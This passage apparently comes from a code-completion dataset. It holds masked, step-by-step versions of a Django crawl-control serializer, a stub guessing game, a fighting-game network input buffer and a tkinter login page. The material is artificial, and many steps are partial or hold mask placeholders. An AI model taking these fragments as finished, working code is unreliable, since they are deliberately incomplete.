"step-2": "<mask token>\n\n\nclass CrawlSerializer(serializers.Serializer):\n <mask token>\n <mask token>\n\n def create(self, validated_data):\n \"\"\"Start a network crawl\"\"\"\n crawl = validated_data['crawl']\n if crawl == CRAWL_COMMAND_START:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_CRAWLING, None)\n start_crawl.delay()\n if crawl == CRAWL_COMMAND_STOP:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_STOP_REQUESTED, None)\n return validated_data\n\n def is_valid(self, raise_exception=False):\n with cache.lock(CRAWL_CACHE_LOCK_KEY):\n return super().is_valid(raise_exception)\n\n def update(self, instance, validated_data):\n raise RuntimeError('Method unavailable')\n\n def validate_crawl(self, crawl):\n \"\"\"\n Validate the correct crawl command is given\n\n - can not start new crawl when already crawling\n - can not stop crawl if not crawling\n \"\"\"\n crawl_status = cache.get(CRAWL_STATUS)\n if crawl == CRAWL_COMMAND_START and crawl_status in (\n CRAWL_STATUS_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_start_crawl'])\n if crawl == CRAWL_COMMAND_STOP and crawl_status in (\n CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_stop_crawl'])\n return crawl\n",
"step-3": "<mask token>\n\n\nclass CrawlSerializer(serializers.Serializer):\n crawl = serializers.ChoiceField(choices=[CRAWL_COMMAND_START,\n CRAWL_COMMAND_STOP])\n default_error_messages = {**serializers.Serializer.\n default_error_messages, 'cant_start_crawl':\n 'Can not start new crawl when already crawling', 'cant_stop_crawl':\n 'Can not stop crawl if not crawling'}\n\n def create(self, validated_data):\n \"\"\"Start a network crawl\"\"\"\n crawl = validated_data['crawl']\n if crawl == CRAWL_COMMAND_START:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_CRAWLING, None)\n start_crawl.delay()\n if crawl == CRAWL_COMMAND_STOP:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_STOP_REQUESTED, None)\n return validated_data\n\n def is_valid(self, raise_exception=False):\n with cache.lock(CRAWL_CACHE_LOCK_KEY):\n return super().is_valid(raise_exception)\n\n def update(self, instance, validated_data):\n raise RuntimeError('Method unavailable')\n\n def validate_crawl(self, crawl):\n \"\"\"\n Validate the correct crawl command is given\n\n - can not start new crawl when already crawling\n - can not stop crawl if not crawling\n \"\"\"\n crawl_status = cache.get(CRAWL_STATUS)\n if crawl == CRAWL_COMMAND_START and crawl_status in (\n CRAWL_STATUS_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_start_crawl'])\n if crawl == CRAWL_COMMAND_STOP and crawl_status in (\n CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_stop_crawl'])\n return crawl\n",
"step-4": "from django.core.cache import cache\nfrom rest_framework import serializers\nfrom thenewboston.constants.crawl import CRAWL_COMMAND_START, CRAWL_COMMAND_STOP, CRAWL_STATUS_CRAWLING, CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED\nfrom v1.cache_tools.cache_keys import CRAWL_CACHE_LOCK_KEY, CRAWL_STATUS\nfrom v1.tasks.crawl import start_crawl\n\n\nclass CrawlSerializer(serializers.Serializer):\n crawl = serializers.ChoiceField(choices=[CRAWL_COMMAND_START,\n CRAWL_COMMAND_STOP])\n default_error_messages = {**serializers.Serializer.\n default_error_messages, 'cant_start_crawl':\n 'Can not start new crawl when already crawling', 'cant_stop_crawl':\n 'Can not stop crawl if not crawling'}\n\n def create(self, validated_data):\n \"\"\"Start a network crawl\"\"\"\n crawl = validated_data['crawl']\n if crawl == CRAWL_COMMAND_START:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_CRAWLING, None)\n start_crawl.delay()\n if crawl == CRAWL_COMMAND_STOP:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_STOP_REQUESTED, None)\n return validated_data\n\n def is_valid(self, raise_exception=False):\n with cache.lock(CRAWL_CACHE_LOCK_KEY):\n return super().is_valid(raise_exception)\n\n def update(self, instance, validated_data):\n raise RuntimeError('Method unavailable')\n\n def validate_crawl(self, crawl):\n \"\"\"\n Validate the correct crawl command is given\n\n - can not start new crawl when already crawling\n - can not stop crawl if not crawling\n \"\"\"\n crawl_status = cache.get(CRAWL_STATUS)\n if crawl == CRAWL_COMMAND_START and crawl_status in (\n CRAWL_STATUS_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_start_crawl'])\n if crawl == CRAWL_COMMAND_STOP and crawl_status in (\n CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages[\n 'cant_stop_crawl'])\n return crawl\n",
"step-5": "from django.core.cache import cache\nfrom rest_framework import serializers\nfrom thenewboston.constants.crawl import (\n CRAWL_COMMAND_START,\n CRAWL_COMMAND_STOP,\n CRAWL_STATUS_CRAWLING,\n CRAWL_STATUS_NOT_CRAWLING,\n CRAWL_STATUS_STOP_REQUESTED\n)\n\nfrom v1.cache_tools.cache_keys import CRAWL_CACHE_LOCK_KEY, CRAWL_STATUS\nfrom v1.tasks.crawl import start_crawl\n\n\nclass CrawlSerializer(serializers.Serializer):\n crawl = serializers.ChoiceField(choices=[CRAWL_COMMAND_START, CRAWL_COMMAND_STOP])\n\n default_error_messages = {\n **serializers.Serializer.default_error_messages,\n 'cant_start_crawl': 'Can not start new crawl when already crawling',\n 'cant_stop_crawl': 'Can not stop crawl if not crawling',\n }\n\n def create(self, validated_data):\n \"\"\"Start a network crawl\"\"\"\n crawl = validated_data['crawl']\n\n if crawl == CRAWL_COMMAND_START:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_CRAWLING, None)\n start_crawl.delay()\n\n if crawl == CRAWL_COMMAND_STOP:\n cache.set(CRAWL_STATUS, CRAWL_STATUS_STOP_REQUESTED, None)\n\n return validated_data\n\n def is_valid(self, raise_exception=False):\n with cache.lock(CRAWL_CACHE_LOCK_KEY):\n return super().is_valid(raise_exception)\n\n def update(self, instance, validated_data):\n raise RuntimeError('Method unavailable')\n\n def validate_crawl(self, crawl):\n \"\"\"\n Validate the correct crawl command is given\n\n - can not start new crawl when already crawling\n - can not stop crawl if not crawling\n \"\"\"\n crawl_status = cache.get(CRAWL_STATUS)\n\n if crawl == CRAWL_COMMAND_START and crawl_status in (CRAWL_STATUS_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages['cant_start_crawl'])\n\n if crawl == CRAWL_COMMAND_STOP and crawl_status in (CRAWL_STATUS_NOT_CRAWLING, CRAWL_STATUS_STOP_REQUESTED):\n raise serializers.ValidationError(self.error_messages['cant_stop_crawl'])\n\n return crawl\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
# Title banner for the console guessing game.
print("Welcome to the Guessing Game 2.0\n")

# Difficulty menu: one line per level with its number range.
for menu_line in ("1 = Easy\t(1 - 10)", "2 = Medium\t(1 - 50)", "3 = Hard\t(1 - 100)"):
    print(menu_line)

# Planned flow (not yet implemented):
# Player: Input user's choice
# while: Check if user enters 1 or 2 or 3
# CPU: Generate a random number
# Player: Input user's number
# Variable: Add a variable 'attempt' and assign 1
# while: Check user number is wrong
# Conditional Statement: Check if user number is whether higher or lower.
# Player: Input user's number
# Variable: Add 1 to 'attempt'
# Result with attempts
# Player: Input user's choice
# Print: Thank you for playing the game.
|
normal
|
{
"blob_id": "7f2489aa440441568af153b231420aa2736716ca",
"index": 4052,
"step-1": "<mask token>\n",
"step-2": "print('Welcome to the Guessing Game 2.0\\n')\nprint('1 = Easy\\t(1 - 10)')\nprint('2 = Medium\\t(1 - 50)')\nprint('3 = Hard\\t(1 - 100)')\n",
"step-3": "print (\"Welcome to the Guessing Game 2.0\\n\")\n\nprint (\"1 = Easy\\t(1 - 10)\")\nprint (\"2 = Medium\\t(1 - 50)\")\nprint (\"3 = Hard\\t(1 - 100)\")\n\n# Player: Input user's choice\n\n\n# while: Check if user enters 1 or 2 or 3\n\n\n # CPU: Generate a random number\n\n\n # Player: Input user's number\n\n\n # Variable: Add a variable 'attempt' and assign 1\n\n\n # while: Check user number is wrong\n\n\n # Conditional Statement: Check if user number is whether higher or lower.\n\n\n # Player: Input user's number\n\n\n # Variable: Add 1 to 'attempt'\n\n\n # Result with attempts\n\n\n # Player: Input user's choice\n\n\n# Print: Thank you for playing the game.",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class OutgoingNetworkInputBuffer(InputBuffer):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InputBuffer:
<|reserved_special_token_0|>
class Value(Enum):
LEFT = 'l'
RIGHT = 'r'
UP = 'u'
DOWN = 'd'
WEAK_PUNCH = 'wp'
<|reserved_special_token_0|>
def __str__(self):
return f'{self._inputs}'
<|reserved_special_token_0|>
@property
def values(self) ->list:
return self._inputs.values()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def is_empty(self) ->bool:
return len(self._inputs) == 0
def clear(self):
self._inputs.clear()
<|reserved_special_token_0|>
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InputBuffer:
<|reserved_special_token_0|>
class Value(Enum):
LEFT = 'l'
RIGHT = 'r'
UP = 'u'
DOWN = 'd'
WEAK_PUNCH = 'wp'
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
self._inputs = {}
self.left_action_name = left_action_name
self.right_action_name = right_action_name
self.weak_punch_action_name = weak_punch_action_name
self._frame_limit = frame_limit
def __str__(self):
return f'{self._inputs}'
<|reserved_special_token_0|>
@property
def values(self) ->list:
return self._inputs.values()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def is_empty(self) ->bool:
return len(self._inputs) == 0
def clear(self):
self._inputs.clear()
<|reserved_special_token_0|>
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InputBuffer:
<|reserved_special_token_0|>
class Value(Enum):
LEFT = 'l'
RIGHT = 'r'
UP = 'u'
DOWN = 'd'
WEAK_PUNCH = 'wp'
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
self._inputs = {}
self.left_action_name = left_action_name
self.right_action_name = right_action_name
self.weak_punch_action_name = weak_punch_action_name
self._frame_limit = frame_limit
def __str__(self):
return f'{self._inputs}'
def __repr__(self):
return f'{self._inputs}'
@property
def values(self) ->list:
return self._inputs.values()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_frame_inputs(self, frame: int) ->list:
return self._inputs.get(frame, [])
def is_empty(self) ->bool:
return len(self._inputs) == 0
def clear(self):
self._inputs.clear()
<|reserved_special_token_0|>
class OutgoingNetworkInputBuffer(InputBuffer):
def __init__(self, left_action_name: str, right_action_name: str,
weak_punch_action_name: str, frame_limit=12):
super().__init__(left_action_name=left_action_name,
right_action_name=right_action_name, weak_punch_action_name=
weak_punch_action_name, frame_limit=frame_limit)
self.game_properties = GameProperties()
def poll_client_inputs(self, frame: int) ->None:
super().poll_client_inputs(frame=frame)
frame_inputs = self.get_frame_inputs(frame=frame)
if frame_inputs:
if self.game_properties.is_server:
Server.send_message_to_all_clients(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
else:
Client.send_message_to_server(message=
f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'
)
class IncomingNetworkInputBuffer(InputBuffer):
def __init__(self, frame_limit=12):
super().__init__(left_action_name='', right_action_name='',
weak_punch_action_name='', frame_limit=frame_limit)
self.game_properties = GameProperties()
def add_input(self, input: str, frame: int) ->None:
if frame in self._inputs:
self._inputs[frame].append(input)
else:
self._inputs[frame] = [input]
def poll_client_inputs(self, frame: int) ->None:
if not self.game_properties.has_received_network_inputs:
pass
self._inputs.pop(frame - self._frame_limit, None)
<|reserved_special_token_1|>
from enum import Enum
from roll.input import Input
from roll.network import Server, Client
from assets.game_projects.fighter.src.game_properties import GameProperties
from assets.game_projects.fighter.src.network_message import NetworkMessage
class InputBuffer:
    """
    Collects per-frame game input from both players. The game state pulls
    data from here when needed, and network messages update the buffer with
    the opposite player's inputs.
    """

    class Value(Enum):
        LEFT = "l"
        RIGHT = "r"
        UP = "u"
        DOWN = "d"
        WEAK_PUNCH = "wp"

    def __init__(
        self,
        left_action_name: str,
        right_action_name: str,
        weak_punch_action_name: str,
        frame_limit=12,
    ):
        # frame number -> list of input value strings recorded that frame
        self._inputs = {}
        self.left_action_name = left_action_name
        self.right_action_name = right_action_name
        self.weak_punch_action_name = weak_punch_action_name
        # Entries older than frame_limit frames are evicted while polling.
        self._frame_limit = frame_limit

    def __str__(self):
        return f"{self._inputs}"

    def __repr__(self):
        return str(self)

    @property
    def values(self) -> list:
        return self._inputs.values()

    def add_input(self, input, frame: int) -> None:
        # Stores the enum's underlying string, not the enum member itself.
        self._inputs.setdefault(frame, []).append(input.value)

    def get_inputs(self) -> dict:
        return self._inputs

    def get_frame_inputs(self, frame: int) -> list:
        return self._inputs.get(frame, [])

    def is_empty(self) -> bool:
        return not self._inputs

    def clear(self):
        self._inputs.clear()

    def poll_client_inputs(self, frame: int) -> None:
        # Left/right are mutually exclusive; punch can combine with either.
        if Input.is_action_pressed(action_name=self.left_action_name):
            self.add_input(input=InputBuffer.Value.LEFT, frame=frame)
        elif Input.is_action_pressed(action_name=self.right_action_name):
            self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)
        if Input.is_action_pressed(action_name=self.weak_punch_action_name):
            self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)
        # Drop the entry that just fell outside the retention window.
        self._inputs.pop(frame - self._frame_limit, None)
class OutgoingNetworkInputBuffer(InputBuffer):
    """Polls local device input and forwards each frame's inputs to the peer."""

    def __init__(
        self,
        left_action_name: str,
        right_action_name: str,
        weak_punch_action_name: str,
        frame_limit=12,
    ):
        super().__init__(
            left_action_name=left_action_name,
            right_action_name=right_action_name,
            weak_punch_action_name=weak_punch_action_name,
            frame_limit=frame_limit,
        )
        self.game_properties = GameProperties()

    def poll_client_inputs(self, frame: int) -> None:
        super().poll_client_inputs(frame=frame)
        inputs_this_frame = self.get_frame_inputs(frame=frame)
        if not inputs_this_frame:
            return
        # Same wire format regardless of role; only the destination differs.
        message = f"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=inputs_this_frame)}"
        if self.game_properties.is_server:
            Server.send_message_to_all_clients(message=message)
        else:
            Client.send_message_to_server(message=message)
class IncomingNetworkInputBuffer(InputBuffer):
    """Buffers inputs received over the network from the remote player."""

    def __init__(self, frame_limit=12):
        # Action names are unused here: inputs arrive via network messages,
        # not from local device polling.
        super().__init__(
            left_action_name="",
            right_action_name="",
            weak_punch_action_name="",
            frame_limit=frame_limit,
        )
        self.game_properties = GameProperties()

    def add_input(self, input: str, frame: int) -> None:
        # Network inputs arrive as raw strings, so they are stored directly
        # (the base class stores an enum member's .value instead).
        self._inputs.setdefault(frame, []).append(input)

    def poll_client_inputs(self, frame: int) -> None:
        # TODO: Proper prediction
        if not self.game_properties.has_received_network_inputs:
            pass
        # Evict the entry that just left the retention window.
        self._inputs.pop(frame - self._frame_limit, None)
|
flexible
|
{
"blob_id": "4789546128263bd298f8f5827734f8402747b9ac",
"index": 67,
"step-1": "<mask token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n <mask token>\n <mask token>\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n",
"step-2": "<mask token>\n\n\nclass InputBuffer:\n <mask token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n <mask token>\n\n def __str__(self):\n return f'{self._inputs}'\n <mask token>\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n <mask token>\n <mask token>\n <mask token>\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n <mask token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n",
"step-3": "<mask token>\n\n\nclass InputBuffer:\n <mask token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n <mask token>\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n <mask token>\n <mask token>\n <mask token>\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n <mask token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n 
else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n",
"step-4": "<mask token>\n\n\nclass InputBuffer:\n <mask token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n <mask token>\n <mask token>\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n <mask token>\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def 
add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n",
"step-5": "from enum import Enum\n\nfrom roll.input import Input\nfrom roll.network import Server, Client\n\nfrom assets.game_projects.fighter.src.game_properties import GameProperties\nfrom assets.game_projects.fighter.src.network_message import NetworkMessage\n\n\nclass InputBuffer:\n \"\"\"\n Responsible for collecting game input from both players. The game state will pull data from here if needed.\n Network messages will also update the input buffer when receiving data from the opposite player\n \"\"\"\n\n class Value(Enum):\n LEFT = \"l\"\n RIGHT = \"r\"\n UP = \"u\"\n DOWN = \"d\"\n WEAK_PUNCH = \"wp\"\n\n def __init__(\n self,\n left_action_name: str,\n right_action_name: str,\n weak_punch_action_name: str,\n frame_limit=12,\n ):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f\"{self._inputs}\"\n\n def __repr__(self):\n return f\"{self._inputs}\"\n\n @property\n def values(self) -> list:\n return self._inputs.values()\n\n def add_input(self, input, frame: int) -> None:\n if frame in self._inputs:\n self._inputs[frame].append(input.value)\n else:\n self._inputs[frame] = [input.value]\n\n def get_inputs(self) -> dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) -> list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) -> bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) -> None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n\n 
self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n def __init__(\n self,\n left_action_name: str,\n right_action_name: str,\n weak_punch_action_name: str,\n frame_limit=12,\n ):\n super().__init__(\n left_action_name=left_action_name,\n right_action_name=right_action_name,\n weak_punch_action_name=weak_punch_action_name,\n frame_limit=frame_limit,\n )\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) -> None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(\n message=f\"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}\"\n )\n else:\n Client.send_message_to_server(\n message=f\"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}\"\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n def __init__(self, frame_limit=12):\n super().__init__(\n left_action_name=\"\",\n right_action_name=\"\",\n weak_punch_action_name=\"\",\n frame_limit=frame_limit,\n )\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) -> None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) -> None:\n # TODO: Proper prediction\n if not self.game_properties.has_received_network_inputs:\n pass\n\n self._inputs.pop(frame - self._frame_limit, None)\n",
"step-ids": [
5,
12,
13,
15,
21
]
}
|
[
5,
12,
13,
15,
21
] |
<|reserved_special_token_0|>
def First_page(root):
    """Render the login screen: title, username/password fields, LogIn and Register buttons."""
    global T1, T2, T3

    background = Frame(root, height=500, width=800, bg='ivory')
    background.pack()

    title = Label(root, text='WELCOME TO AGRI MARKET', font=('Times new roman', 25))
    title.place(x=200, y=50)

    login_button = Button(root, text='LogIn', font=('times new roman', 20),
        command=check_pass, bg='green')
    login_button.place(x=350, y=350)

    username_label = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
    username_label.place(x=150, y=200)
    T1 = tk.Entry(root, width=30, bd=5)
    T1.place(x=280, y=200)

    password_label = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')
    password_label.place(x=150, y=250)
    T2 = tk.Entry(root, width=30, show='*', bd=5)
    T2.place(x=280, y=250)

    register_button = Button(root, text='Register', font=('Arial Bold', 15), bg='blue',
        command=create_pass)
    register_button.place(x=340, y=400)
<|reserved_special_token_0|>
def create_pass():
    """Render the registration form (username, password, confirm password) over the login screen."""
    global root, T1, T2, T3
    # Giant blank label acts as a crude screen wipe over the previous page.
    label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=
        'ivory')
    label.place(x=0, y=0)
    L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')
    L1.place(x=150, y=200)
    T1 = tk.Entry(root, width=30, bd=5)
    T1.place(x=380, y=200)
